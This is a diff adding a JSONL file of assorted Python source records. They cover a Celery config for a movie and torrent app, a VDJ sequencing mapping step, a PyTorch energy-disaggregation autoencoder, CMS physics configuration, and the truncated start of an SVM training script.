diff --git "a/6594.jsonl" "b/6594.jsonl" new file mode 100644--- /dev/null +++ "b/6594.jsonl" @@ -0,0 +1,590 @@ +{"seq_id":"209063347","text":"#-*- coding:utf-8 -*-\n\nimport os\nfrom datetime import timedelta\nfrom celery.utils import Exchange, Queue\nfrom celery.schedules import crontab\n\n\nclass BaseConfig(object):\n PROJECT = 'jotun'\n\n DEBUG = False\n TESTING = False\n\n APP_ROOT = os.path.dirname(os.path.abspath(__file__))\n LOGGING_ROOT = os.path.join(APP_ROOT, '..', 'logs')\n RUN_ROOT = os.path.join(APP_ROOT, '..', 'run')\n\n STATIC_ROOT = os.path.join(APP_ROOT, '..', 'static')\n MEDIA_ROOT = os.path.join(APP_ROOT, '..', 'media')\n POSTERS_ROOT = os.path.join(MEDIA_ROOT, 'posters')\n TORRENTS_ROOT = os.path.join(MEDIA_ROOT, 'torrents')\n\n MEDIA_URL = '/media/'\n\n INSTANCE_FOLDER_PATH = os.path.join(APP_ROOT, '..')\n\n API_VERSION = 'v1'\n\n API_RESOURCES = (\n 'app.movies.views.GenreItemResource',\n 'app.movies.views.GenreListResource',\n 'app.movies.views.GenreMoviesListResource',\n 'app.movies.views.MovieItemResource',\n 'app.movies.views.MovieListResource',\n 'app.movies.views.MovieGenresListResource',\n 'app.movies.views.MovieTorrentsResource',\n 'app.movies.views.RelatedMoviesListResource',\n 'app.torrents.views.DownloadTorrentItemResource',\n 'app.torrents.views.StartTorrentItemResource',\n 'app.torrents.views.StatusTorrentItemResource',\n 'app.torrents.views.StopTorrentItemResource',\n 'app.torrents.views.RemoveTorrentItemResource',\n 'app.torrents.views.TorrentItemResource',\n 'app.torrents.views.TorrentListResource',\n )\n\n BLUEPRINTS = (\n ('app.core.core', '/'),\n )\n\n CONTEXT_PROCESSORS = (\n 'app.core.context_processors.common_context',\n 'app.core.context_processors.navigation',\n )\n\n EXTENSIONS = (\n 'app.extensions.db',\n 'app.extensions.cache',\n 'app.extensions.redis',\n 'app.extensions.sentry',\n 'app.extensions.toolbar',\n 'app.core.init_login'\n )\n\n # Default cache settings\n CACHE_KEY_PREFIX = PROJECT\n CACHE_DEFAULT_TIMEOUT = 900\n\n # Celery settings\n CELERY_IMPORTS = (\n 'app.collection.tasks',\n 'app.movies.tasks',\n 'app.torrents.tasks'\n )\n\n CELERY_QUEUES = (\n Queue('default', Exchange('default', type='direct'),\n routing_key='default'),\n\n Queue('collection', Exchange('collection', type='direct'),\n routing_key='collection'),\n\n Queue('persons', Exchange('persons', type='direct'),\n routing_key='persons'),\n Queue('movies', Exchange('movies', type='direct'),\n routing_key='movies'),\n Queue('relations', Exchange('relations', type='direct'),\n routing_key='relations'),\n\n Queue('torrents', Exchange('torrents', type='direct'),\n routing_key='torrents')\n )\n\n CELERY_DEFAULT_QUEUE = 'default'\n CELERY_DEFAULT_EXCHANGE = 'default'\n CELERY_DEFAULT_ROUTING_KEY = 'default'\n\n CELERYBEAT_SCHEDULE = {\n # 'process_not_added_actors': {\n # 'task': 'app.movies.tasks.process_queue',\n # 'schedule': crontab(minute='*/1'),\n # 'args': (10, 'not_added_actors', 'not added actors'),\n # 'options': {'queue': 'persons'}\n # },\n # 'process_not_added_directors': {\n # 'task': 'app.movies.tasks.process_queue',\n # 'schedule': crontab(minute='*/1'),\n # 'args': (10, 'not_added_directors', 'not added directors'),\n # 'options': {'queue': 'persons'}\n # },\n 'process_not_added_movies': {\n 'task': 'app.movies.tasks.process_queue',\n 'schedule': crontab(minute='*/1'),\n 'kwargs': {\n 'count': 20,\n 'queue': 'not_added_movies',\n 'title': 'not added movies',\n },\n 'options': {'queue': 'movies'}\n },\n # 'process_person_relations': {\n # 'task': 'app.movies.tasks.process_queue',\n # 'schedule': crontab(minute='*/5'),\n # 'args': (5, 'not_saved_persons_relations', 'person relations'),\n # 'options': {'queue': 'relations'}\n # },\n 'process_movie_relations': {\n 'task': 'app.movies.tasks.process_queue',\n 'schedule': crontab(minute='*/1'),\n 'kwargs': {\n 'count': 20,\n 'queue': 'not_saved_movie_relations',\n 'title': 'movie relations',\n 'add_missing': False\n },\n 'options': {'queue': 'relations'}\n }\n }\n\n # Logging settings\n LOGGING = {\n 'version': 1,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n }\n },\n 'handlers': {\n 'file': {\n 'level': 'INFO',\n 'class': 'logging.FileHandler',\n 'filename': os.path.join(LOGGING_ROOT, 'app.log'),\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose'\n }\n },\n 'loggers': {\n 'app': {\n 'handlers': ['console', ],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n }\n }\n","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"572488675","text":"'''\nvdj mapping\n'''\n\nimport subprocess\n\nimport pandas as pd\nimport pysam\n\nfrom celescope.tools.step import Step, s_common\nfrom celescope.vdj.__init__ import CHAINS\nimport celescope.tools.utils as utils\n\n\n@utils.add_log\ndef summary(input_file, alignments, receptor_type, outdir, sample, not_consensus):\n chains = CHAINS[receptor_type]\n\n '''\n # out files\n UMI_unfiltered_file = f'{outdir}/{sample}_UMI_unfiltered.tsv'\n UMI_filtered1_file = f'{outdir}/{sample}_UMI_filtered1.tsv'\n UMI_filtered2_file = f'{outdir}/{sample}_UMI_filtered2.tsv'\n '''\n\n UMI_count_unfiltered_file = f'{outdir}/{sample}_UMI_count_unfiltered.tsv'\n UMI_count_filtered1_file = f'{outdir}/{sample}_UMI_count_filtered1.tsv'\n\n stat_prefix = 'UMIs'\n if not_consensus:\n stat_prefix = 'Reads'\n\n # read input_file\n with pysam.FastxFile(input_file) as fh:\n index = 0\n read_row_list = []\n for entry in fh:\n attr = entry.name.split(\"_\")\n barcode = attr[0]\n umi = attr[1]\n dic = {\"readId\": index, \"barcode\": barcode, \"UMI\": umi}\n read_row_list.append(dic)\n index += 1\n df_read = pd.DataFrame(read_row_list, columns=[\"readId\", \"barcode\", \"UMI\"])\n summary.logger.info(f\"{input_file} to dataframe done.\")\n total_read = df_read.shape[0]\n\n # init row list\n mapping_summary_row_list = []\n\n # mapped\n alignment = pd.read_csv(alignments, sep=\"\\t\")\n alignment.readId = alignment.readId.astype(int)\n align_read = alignment.shape[0]\n df_read.readId = df_read.readId.astype(int)\n df_align = pd.merge(df_read, alignment, on=\"readId\", how=\"right\")\n\n mapping_summary_row_list.append({\n \"item\": f\"{stat_prefix} Mapped to Any VDJ Gene\",\n \"count\": align_read,\n \"total_count\": total_read,\n })\n\n # CDR3\n df_CDR3 = df_align[~pd.isnull(df_align[\"aaSeqCDR3\"])]\n align_read_with_CDR3 = df_CDR3.shape[0]\n mapping_summary_row_list.append({\n \"item\": f\"{stat_prefix} with CDR3\",\n \"count\": align_read_with_CDR3,\n \"total_count\": total_read,\n })\n\n # correct CDR3\n df_correct_CDR3 = df_CDR3[~(df_CDR3[\"aaSeqCDR3\"].str.contains(r\"\\*\"))]\n align_read_with_correct_CDR3 = df_correct_CDR3.shape[0]\n mapping_summary_row_list.append({\n \"item\": f\"{stat_prefix} with Correct CDR3\",\n \"count\": align_read_with_correct_CDR3,\n \"total_count\": total_read,\n })\n\n # VDJ\n df_VJ = df_correct_CDR3[\n (~pd.isnull(df_correct_CDR3['bestVGene'])) &\n (~pd.isnull(df_correct_CDR3['bestJGene']))\n ]\n df_VJ = df_VJ[df_VJ.bestVGene.str[:3] == df_VJ.bestJGene.str[:3]]\n df_VJ[\"chain\"] = df_VJ.bestVGene.str[:3]\n df_VJ[\"VJ_pair\"] = df_VJ[\"bestVGene\"] + \"_\" + df_VJ[\"bestJGene\"]\n Reads_Mapped_Confidently_to_VJ_Gene = df_VJ.shape[0]\n mapping_summary_row_list.append({\n \"item\": f\"{stat_prefix} Mapped Confidently to VJ Gene\",\n \"count\": Reads_Mapped_Confidently_to_VJ_Gene,\n \"total_count\": total_read\n })\n\n # chain\n for chain in chains:\n df_chain = df_VJ[df_VJ.chain == chain]\n Reads_Mapped_to_chain = df_chain.shape[0]\n mapping_summary_row_list.append({\n \"item\": f\"{stat_prefix} Mapped to {chain}\",\n \"count\": Reads_Mapped_to_chain,\n \"total_count\": total_read,\n })\n\n # unique UMI\n df_UMI = df_VJ.drop_duplicates(subset=[\"barcode\", \"UMI\"], keep=\"first\")\n\n # filter1: keep top 1 in each combinations\n groupby_elements = [\n 'barcode',\n 'chain',\n 'bestVGene',\n 'bestJGene',\n 'aaSeqCDR3',\n 'nSeqCDR3',\n ]\n df_UMI_count = df_UMI.groupby(\n groupby_elements, as_index=False).agg({\"UMI\": \"count\"})\n df_UMI_count = df_UMI_count.sort_values(\"UMI\", ascending=False)\n # out unfiltered\n df_UMI_count.to_csv(UMI_count_unfiltered_file, sep=\"\\t\", index=False)\n\n df_UMI_count_filter1 = df_UMI_count.groupby(\n [\"barcode\", \"chain\"], as_index=False).head(1)\n # out filtered1\n df_UMI_count_filter1.to_csv(\n UMI_count_filtered1_file,\n sep=\"\\t\",\n index=False)\n\n '''\n #TODO\n if debug:\n unique_UMI = df_UMI.shape[0]\n mapping_summary_row_list.append({\n \"item\": \"UMI unique count\",\n \"count\": unique_UMI,\n \"total_count\": align_read_with_correct_CDR3,\n })\n UMI_after_Contamination_Filtering = df_UMI_count.filter1.UMI.sum()\n mapping_summary_row_list.append({\n \"item\": \"UMI after Contamination Filtering\",\n \"count\": UMI_after_Contamination_Filtering,\n \"total_count\": unique_UMI,\n })\n '''\n\n # stat file\n df = pd.DataFrame(\n mapping_summary_row_list,\n columns=[\n \"item\",\n \"count\",\n \"total_count\"])\n stat_file = f'{outdir}/stat.txt'\n utils.gen_stat(df, stat_file)\n\n\n@utils.add_log \ndef mixcr(outdir, sample, input_file, thread, species):\n report = f\"{outdir}/{sample}_align.txt\"\n not_align_fq = f\"{outdir}/not_align.fq\"\n read2_vdjca = f\"{outdir}/read2.vdjca\"\n alignments = f\"{outdir}/{sample}_alignments.txt\"\n\n cmd = f\"\"\"\nmixcr align \\\n--force-overwrite \\\n--species {species} \\\n-t {thread} \\\n--not-aligned-R1 {not_align_fq} \\\n--report {report} \\\n-OallowPartialAlignments=true \\\n-OvParameters.geneFeatureToAlign=VTranscriptWithP \\\n{input_file} \\\n{read2_vdjca}\nmixcr exportAlignments \\\n{read2_vdjca} {alignments} \\\n-readIds --force-overwrite -vGene -dGene -jGene -cGene \\\n-nFeature CDR3 -aaFeature CDR3\\n\"\"\"\n mixcr.logger.info(cmd)\n subprocess.check_call(cmd, shell=True)\n return alignments\n\n\n@utils.add_log\ndef mapping_vdj(args):\n\n step_name = f\"{args.type}_mapping_vdj\"\n step = Step(args, step_name)\n\n sample = args.sample\n outdir = args.outdir\n fq = args.fq\n receptor_type = args.type\n thread = int(args.thread)\n not_consensus = args.not_consensus\n species = args.species\n\n input_file = fq\n alignments = mixcr(outdir, sample, input_file, thread, species)\n\n # summary\n summary(input_file, alignments, receptor_type, outdir, sample, not_consensus)\n\n step.clean_up()\n\n\n\ndef get_opts_mapping_vdj(parser, sub_program):\n parser.add_argument(\"--type\", help='TCR or BCR', required=True)\n parser.add_argument('--species', choices=['hs', 'mmu'], help='human or mouse', default='hs')\n parser.add_argument(\"--not_consensus\", action='store_true', help=\"input fastq is not consensus\")\n if sub_program:\n parser = s_common(parser)\n parser.add_argument(\"--fq\", required=True)\n\n","sub_path":"celescope/vdj/mapping_vdj.py","file_name":"mapping_vdj.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"9888198","text":"# Package import\nfrom __future__ import print_function, division\nfrom warnings import warn\nfrom nilmtk.disaggregate import Disaggregator\nimport pandas as pd\nimport numpy as np\nfrom collections import OrderedDict \nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom statistics import mean\nimport os\nimport time\nimport pickle\nimport random\nimport json\nimport torch\nfrom torchsummary import summary\nimport torch.nn as nn\nimport torch.utils.data as tud\nfrom torch.utils.data.dataset import TensorDataset\nfrom torch.utils.tensorboard import SummaryWriter\n\n# Fix the random seed to ensure the reproducibility of the experiment\nrandom_seed = 10\nrandom.seed(random_seed)\nnp.random.seed(random_seed)\ntorch.manual_seed(random_seed)\ntorch.cuda.manual_seed_all(random_seed)\n\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\n# Use cuda or not\nUSE_CUDA = torch.cuda.is_available()\n\nclass DAE_Pytorch_MultiChannel(nn.Module):\n def __init__(self, sequence_length, ndim = 2):\n # Refer to \"KELLY J, KNOTTENBELT W. Neural NILM: Deep neural networks applied to energy disaggregation[C].The 2nd ACM International Conference on Embedded Systems for Energy-Efficient Built Environments\".\n super(DAE_Pytorch_MultiChannel, self).__init__()\n self.sequence_length = sequence_length\n self.conv_1 = nn.Conv1d(ndim, 8, 4, stride = 1)\n self.dense = nn.Sequential(nn.Linear(8 * (sequence_length - 3), 8 * (sequence_length - 3)),nn.ReLU(True), \n nn.Linear(8 * (sequence_length - 3), 128), nn.ReLU(True), nn.Linear(128, 8 * (sequence_length - 3)), nn.ReLU(True))\n self.deconv_2 = nn.ConvTranspose1d(8, 1, 4, stride = 1)\n\n def forward(self,power_seq):\n inp = self.conv_1(power_seq).view(power_seq.size(0), -1)\n tmp = self.dense(inp).view(power_seq.size(0), 8, -1)\n out = self.deconv_2(tmp)\n return out\n\ndef initialize(layer):\n # Xavier_uniform will be applied to conv1d and dense layer, to be consistent with Keras and Tensorflow\n if isinstance(layer,nn.Conv1d) or isinstance(layer, nn.Linear) or isinstance(layer, nn.ConvTranspose1d): \n torch.nn.init.xavier_uniform_(layer.weight.data)\n if layer.bias is not None:\n torch.nn.init.constant_(layer.bias.data, val = 0.0)\n\ndef train(appliance_name,model, mains, appliance, epochs, batch_size, pretrain, checkpoint_interval = None, train_patience = 3):\n # Model configuration\n if USE_CUDA:\n model = model.cuda()\n if not pretrain:\n model.apply(initialize)\n # summary(model, (1, mains.shape[1]))\n # Split the train and validation set\n train_mains,valid_mains,train_appliance,valid_appliance = train_test_split(mains, appliance, test_size=.2, random_state = random_seed)\n\n # Create optimizer, loss function, and dataloader\n optimizer = torch.optim.Adam(model.parameters(), lr = 1e-3)\n loss_fn = torch.nn.MSELoss(reduction = 'mean')\n\n train_dataset = TensorDataset(torch.from_numpy(train_mains).float().permute(0,2,1), torch.from_numpy(train_appliance).float().permute(0,2,1))\n train_loader = tud.DataLoader(train_dataset, batch_size = batch_size, shuffle = True, num_workers = 0, drop_last = True)\n\n valid_dataset = TensorDataset(torch.from_numpy(valid_mains).float().permute(0,2,1), torch.from_numpy(valid_appliance).float().permute(0,2,1))\n valid_loader = tud.DataLoader(valid_dataset, batch_size = batch_size, shuffle = True, num_workers = 0, drop_last = True)\n\n writer = SummaryWriter(comment = 'train_visual')\n patience, best_loss = 0, None\n\n for epoch in range(epochs):\n # Earlystopping\n if(patience == train_patience):\n print(\"val_loss did not improve after {} Epochs, thus Earlystopping is calling\".format(train_patience))\n break \n # Train the model\n st = time.time() \n model.train()\n \n for i, (batch_mains, batch_appliance) in enumerate(train_loader):\n if USE_CUDA:\n batch_mains = batch_mains.cuda()\n batch_appliance = batch_appliance.cuda()\n \n batch_pred = model(batch_mains)\n loss = loss_fn(batch_pred, batch_appliance)\n\n model.zero_grad() \n loss.backward()\n optimizer.step()\n ed = time.time()\n\n # Evaluate the model \n model.eval()\n with torch.no_grad():\n cnt, loss_sum = 0, 0\n for i, (batch_mains, batch_appliance) in enumerate(valid_loader):\n if USE_CUDA:\n batch_mains = batch_mains.cuda()\n batch_appliance = batch_appliance.cuda()\n \n batch_pred = model(batch_mains)\n loss = loss_fn(batch_appliance, batch_pred)\n loss_sum += loss\n cnt += 1 \n\n final_loss = loss_sum / cnt\n # Save best only\n if best_loss is None or final_loss < best_loss:\n best_loss = final_loss\n patience = 0\n net_state_dict = model.state_dict()\n path_state_dict = \"./\"+appliance_name+\"_mul_dae_best_state_dict.pt\"\n torch.save(net_state_dict, path_state_dict)\n else:\n patience = patience + 1 \n\n print(\"Epoch: {}, Valid_Loss: {}, Time consumption: {}s.\".format(epoch, final_loss, ed - st))\n # For the visualization of training process\n for name,param in model.named_parameters():\n writer.add_histogram(name + '_grad', param.grad, epoch)\n writer.add_histogram(name + '_data', param, epoch)\n writer.add_scalars(\"MSELoss\", {\"Valid\":final_loss}, epoch)\n\n # Save checkpoint\n if (checkpoint_interval != None) and ((epoch + 1) % checkpoint_interval == 0):\n checkpoint = {\"model_state_dict\": model.state_dict(),\n \"optimizer_state_dict\": optimizer.state_dict(),\n \"epoch\": epoch}\n path_checkpoint = \"./\"+appliance_name+\"_mul_dae_checkpoint_{}_epoch.pt\".format(epoch)\n torch.save(checkpoint, path_checkpoint)\n\ndef test(model, test_mains, batch_size = 512):\n # Model test\n st = time.time()\n model.eval()\n # Create test dataset and dataloader\n batch_size = test_mains.shape[0] if batch_size > test_mains.shape[0] else batch_size\n test_dataset = TensorDataset(torch.from_numpy(test_mains).float().permute(0,2,1))\n test_loader = tud.DataLoader(test_dataset, batch_size = batch_size, shuffle = False, num_workers = 0)\n with torch.no_grad():\n for i, batch_mains in enumerate(test_loader):\n batch_pred = model(batch_mains[0])\n if i == 0:\n res = batch_pred\n else:\n res = torch.cat((res, batch_pred), dim = 0)\n ed = time.time()\n print(\"Inference Time consumption: {}s.\".format(ed - st))\n return res.numpy()\n\n\nclass MUL_DAE(Disaggregator): \n def __init__(self, params):\n self.MODEL_NAME = \"MUL_DAE\"\n self.sequence_length = params.get('sequence_length',129)\n self.n_epochs = params.get('n_epochs', 10)\n self.batch_size = params.get('batch_size',512)\n self.appliance_params = params.get('appliance_params',{})\n self.mains_mean = params.get('mains_mean',None)\n self.mains_std = params.get('mains_std',None)\n self.models = OrderedDict() \n \n def partial_fit(self, train_main, train_appliances, pretrain = False, do_preprocessing=True,pretrain_path = \"./dae_pre_state_dict.pkl\",**load_kwargs): \n # If no appliance wise parameters are specified, then they are computed from the data\n if len(self.appliance_params) == 0:\n self.set_appliance_params(train_appliances)\n\n # print(train_main[0].shape) # (1440, 2)\n # Preprocess the data and bring it to a valid shape\n if do_preprocessing:\n print (\"Doing Preprocessing\")\n train_main,train_appliances = self.call_preprocessing(train_main,train_appliances,'train')\n # print(train_main.shape)\n train_main = np.concatenate(train_main, axis = 0)\n # train_main = train_main.reshape((-1,self.sequence_length,1))\n\n new_train_appliances = []\n for app_name, app_arr in train_appliances:\n app_arr = np.concatenate(app_arr, axis=0)\n # print(app_arr.shape)\n # app_df = app_df.reshape((-1,self.sequence_length,1))\n new_train_appliances.append((app_name, app_arr))\n train_appliances = new_train_appliances\n for appliance_name, power in train_appliances:\n if appliance_name not in self.models:\n print (\"First model training for \",appliance_name)\n self.models[appliance_name] = DAE_Pytorch_MultiChannel(self.sequence_length, train_main.shape[2])\n # Load pretrain dict or not\n if pretrain is True:\n self.models[appliance_name].load_state_dict(torch.load(\"./\"+appliance_name+\"_mul_dae_pre_state_dict.pt\"))\n \n model = self.models[appliance_name]\n train(appliance_name, model, train_main, power, self.n_epochs, self.batch_size, pretrain)\n # Model test will be based on the best model\n self.models[appliance_name].load_state_dict(torch.load(\"./\"+appliance_name+\"_mul_dae_best_state_dict.pt\"))\n\n\n def disaggregate_chunk(self, test_main_list, do_preprocessing = True):\n # Disaggregate (test process)\n if do_preprocessing:\n test_main_list = self.call_preprocessing(test_main_list,submeters_lst = None,method='test')\n\n test_predictions = []\n for test_main in test_main_list:\n # test_main = test_main.values.reshape((-1,self.sequence_length,1))\n disggregation_dict = {}\n\n for appliance in self.models:\n # Move the model to cpu, and then test it\n model = self.models[appliance].to('cpu')\n prediction = test(model, test_main)\n app_mean, app_std = self.appliance_params[appliance]['mean'], self.appliance_params[appliance]['std']\n prediction = self.denormalize_output(prediction,app_mean,app_std)\n valid_predictions = prediction.flatten()\n valid_predictions = np.where(valid_predictions > 0, valid_predictions, 0)\n series = pd.Series(valid_predictions)\n disggregation_dict[appliance] = series\n results = pd.DataFrame(disggregation_dict, dtype = 'float32')\n test_predictions.append(results)\n return test_predictions\n\n def call_preprocessing(self, mains_lst, submeters_lst, method):\n # Seq2Seq Version\n sequence_length = self.sequence_length\n if method=='train':\n # Preprocess the main and appliance data, the parameter 'overlapping' will be set 'True'\n processed_mains = []\n for mains in mains_lst:\n self.mains_mean, self.mains_std = mains.values.mean(), mains.values.std() \n mains = self.normalize_data(mains.values,sequence_length, True)\n processed_mains.append(mains)\n\n tuples_of_appliances = []\n for (appliance_name,app_df_list) in submeters_lst:\n app_mean = self.appliance_params[appliance_name]['mean']\n app_std = self.appliance_params[appliance_name]['std']\n processed_app_dfs = []\n for app_df in app_df_list:\n data = self.normalize_data(app_df.values, sequence_length, True)\n processed_app_dfs.append(data) \n tuples_of_appliances.append((appliance_name, processed_app_dfs))\n\n return processed_mains, tuples_of_appliances\n\n if method=='test':\n # Preprocess the main data only, the parameter 'overlapping' will be set 'False'\n processed_mains = []\n for mains in mains_lst: \n mains = self.normalize_data(mains.values,sequence_length, False)\n processed_mains.append(mains)\n return processed_mains\n \n def normalize_data(self,data,sequence_length, overlapping = False):\n # If you want to train the model,then overlapping = True will bring you a lot more training data; else overlapping = false to disaggregate the mains data\n n = sequence_length\n excess_entries = sequence_length - (data.shape[0] % sequence_length) \n windowed_x_all = []\n for i in range(data.shape[1]):\n lst = np.array([0] * excess_entries)\n arr = np.concatenate((data[:,i].flatten(), lst), axis = 0) \n mean, std = np.mean(data[:,i]), np.std(data[:,i])\n if overlapping:\n windowed_x = np.array([arr[j:j + n] for j in range(len(arr)-n+1)])\n else:\n windowed_x = arr.reshape((-1,sequence_length))\n # print(windowed_x.shape)\n windowed_x = (windowed_x - mean) / std\n windowed_x_all.append(windowed_x.reshape(-1, n, 1))\n windowed_x_all = np.concatenate(windowed_x_all, axis = 2)\n return windowed_x_all\n\n def denormalize_output(self,data,mean,std):\n # x = y * std + mean\n return mean + data * std\n \n def set_appliance_params(self,train_appliances):\n # Set appliance mean and std to normalize the label(appliance data)\n for (app_name, df_list) in train_appliances:\n l = np.array(pd.concat(df_list, axis=0))\n app_mean = np.mean(l)\n app_std = np.std(l)\n self.appliance_params.update({app_name:{'mean':app_mean,'std':app_std}})\n","sub_path":"nilmtk/disaggregate/dae_pytorch_multidim.py","file_name":"dae_pytorch_multidim.py","file_ext":"py","file_size_in_byte":13796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"606241410","text":"from PhysicsTools.PatAlgos.patTemplate_cfg import *\nfrom PhysicsTools.PatAlgos.tools.coreTools import *\nfrom PhysicsTools.PatAlgos.tools.trigTools import switchOnTrigger\nfrom PhysicsTools.PatAlgos.tools.metTools import addPfMET\nfrom PhysicsTools.PatAlgos.tools.pfTools import addPFCandidates\nfrom PhysicsTools.PatAlgos.tools.pfTools import *\n\ndef common_config(process, reportEveryNum=100, maxEvents=-1, runOnData=False) :\n usePFIso( process )\n if runOnData:\n removeMCMatching(process, ['All'])\n\n process.patElectrons.pfElectronSource = 'particleFlow'\n addPfMET(process, 'PF')\n\n switchOnTrigger(process)\n process.patTrigger.addL1Algos = cms.bool(True)\n \n # this is needed so we can correct the pfMET by adjusting the e/mu-pt\n # when switching to one of the dedicated Heep/TeV muon reconstructors\n addPFCandidates(process, 'particleFlow')\n process.selectedPatPFParticles.cut = \"abs(pdgId())==11 || abs(pdgId())==13\"\n\n process.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\n process.MessageLogger.cerr.FwkReport.reportEvery = reportEveryNum\n\n process.maxEvents.input = maxEvents ## (e.g. -1 to run on all events)\n# process.GlobalTag.globaltag = cms.string('GR_R_52_V8::All')\n process.GlobalTag.globaltag = cms.string('FT53_V21A_AN6::All')\n # ##\n process.out.outputCommands = [\n # GEN\n 'keep *_prunedGenParticles_*_*',\n 'keep GenEventInfoProduct_*_*_*',\n 'keep GenRunInfoProduct_*_*_*',\n # TRIGGER\n 'keep edmTriggerResults_TriggerResults*_*_*',\n 'keep *_hltTriggerSummaryAOD_*_*',\n 'keep L1GlobalTriggerReadoutRecord_gtDigis_*_*',\n 'keep *_userPat*_*_*',\n 'keep *_patTrigger_*_*',\n 'keep *_patTriggerEvent_*_*',\n # PILEUP\n 'keep *_addPileupInfo_*_*', \n # PF CANDS\n 'keep *_selectedPatPFParticles*_*_*'\n ]\n \n## (to suppress the long output at the end of the job) \n process.options.wantSummary = True \n\n\ndef common_filters(process) :\n ##Common Filters ############\n #CSC\n process.load('RecoMET.METAnalyzers.CSCHaloFilter_cfi')\n process.p *= process.CSCTightHaloFilter\n \n #HBHE\n process.load('CommonTools/RecoAlgos/HBHENoiseFilter_cfi')\n process.p *= process.HBHENoiseFilter\n\n #HCAL Laser\n process.load(\"RecoMET.METFilters.hcalLaserEventFilter_cfi\")\n process.p *= process.hcalLaserEventFilter\n\n #ECAL deal cell TP\n process.load('RecoMET.METFilters.EcalDeadCellTriggerPrimitiveFilter_cfi')\n ## For AOD and RECO recommendation to use recovered rechits\n process.EcalDeadCellTriggerPrimitiveFilter.tpDigiCollection = cms.InputTag(\"ecalTPSkimNA\")\n\n # The section below is for the filter on Boundary Energy. Available in AOD in CMSSW>44x\n process.load('RecoMET.METFilters.EcalDeadCellBoundaryEnergyFilter_cfi')\n process.EcalDeadCellBoundaryEnergyFilter.taggingMode = cms.bool(False)\n process.EcalDeadCellBoundaryEnergyFilter.cutBoundEnergyDeadCellsEB=cms.untracked.double(10)\n process.EcalDeadCellBoundaryEnergyFilter.cutBoundEnergyDeadCellsEE=cms.untracked.double(10)\n process.EcalDeadCellBoundaryEnergyFilter.cutBoundEnergyGapEB=cms.untracked.double(100)\n process.EcalDeadCellBoundaryEnergyFilter.cutBoundEnergyGapEE=cms.untracked.double(100)\n process.EcalDeadCellBoundaryEnergyFilter.enableGap=cms.untracked.bool(False)\n process.EcalDeadCellBoundaryEnergyFilter.limitDeadCellToChannelStatusEB = cms.vint32(12,14)\n process.EcalDeadCellBoundaryEnergyFilter.limitDeadCellToChannelStatusEE = cms.vint32(12,14)\n # End of Boundary Energy filter configuration\n\n # The line below is the default recommendation\n process.p *= process.EcalDeadCellTriggerPrimitiveFilter\n\n #Tracking Failure\n process.goodVertices = cms.EDFilter(\n \"VertexSelector\",\n filter = cms.bool(False),\n src = cms.InputTag(\"offlinePrimaryVertices\"),\n cut = cms.string(\"!isFake && ndof > 4 && abs(z) <= 24 && position.rho < 2\")\n )\n\n process.load('RecoMET.METFilters.trackingFailureFilter_cfi')\n process.out.outputCommands.append('keep *_goodVertices_*_*')\n\n process.p *= process.goodVertices*process.trackingFailureFilter\n\n #Bad EE SC\n process.load('RecoMET.METFilters.eeBadScFilter_cfi')\n\n process.p *= process.eeBadScFilter\n\n #ECAL Laser\n\n #Tracking POG\n","sub_path":"WZSkimProduction/python/patTuple_common_cfg.py","file_name":"patTuple_common_cfg.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"556994630","text":"import numpy as np\nfrom scipy.misc import imread\nfrom scipy.misc import imresize\nimport numpy.matlib\nimport scipy.io as sio\nimport os\nimport cv2\nimport matplotlib.pyplot as plt\nimport dlib\nimport requests\nfrom PIL import Image\nfrom imutils import face_utils\nimport matplotlib.path as mpltPath\nimport csv\nfrom concurrent.futures import ThreadPoolExecutor, wait, as_completed\nimport threading\nfrom sklearn.cross_validation import train_test_split\n\nfullpathprocessed = '/Users/clmeiste/TimAikenDocs/SeniorProject/Database/Processed/featurevectors/'\nfullpathSVM = '/Users/clmeiste/TimAikenDocs/SeniorProject/Classifiers/SVM/'\n \nqualityBad = fullpathprocessed + 'qualityBad.bin'\nqualityOK = fullpathprocessed + 'qualityOk.bin'\nqualitySVMradial = fullpathSVM + 'qualityRBF.xml'\nqualitySVMlinear = fullpathSVM + 'qualityLinear.xml'\n \ncontrastBad = fullpathprocessed + 'constrastBad.bin'\ncontrastOK = fullpathprocessed + 'constrastOK.bin'\ncontrastSVMradial = fullpathSVM + 'contrastRBF.xml'\ncontrastSVMlinear = fullpathSVM + 'contrastLinear.xml'\n \ndarkBad = fullpathprocessed + 'darkBad.bin'\ndarkOK = fullpathprocessed + 'darkOK.bin'\ndarkSVMradial = fullpathSVM + 'darkRBF.xml'\ndarkSVMlinear = fullpathSVM + 'darkLinear.xml'\n \neyesBad = fullpathprocessed + 'eyesBad.bin'\neyesOK = fullpathprocessed + 'eyesOK.bin'\neyesSVMradial = fullpathSVM + 'eyesRBF.xml'\neyesSVMlinear = fullpathSVM + 'eyesLinear.xml'\n \nflatBad = fullpathprocessed + 'flatBad.bin'\nflatOK = fullpathprocessed + 'flatOK.bin'\nflatSVMradial = fullpathSVM + 'flatRBF.xml'\nflatSVMlinear = fullpathSVM + 'flatLinear.xml'\n\ndef createRadialSVMs():\n trainSVMRadial(flatBad, flatOK, flatSVMradial)\n trainSVMRadial(eyesBad, eyesOK, eyesSVMradial)\n trainSVMRadial(darkBad, darkOK, darkSVMradial)\n trainSVMRadial(contrastBad, contrastOK, contrastSVMradial)\n trainSVMRadial(qualityBad, qualityOK, qualitySVMradial)\n\ndef trainSVMRadial(badfile, okfile, saveLocation):\n \n badData = np.fromfile(badfile).reshape((-1, 8))\n badDataTraining = badData[0:int(badData.shape[0] * 0.8),:]\n badClassTraining = np.ones((badDataTraining.shape[0], 1))\n \n 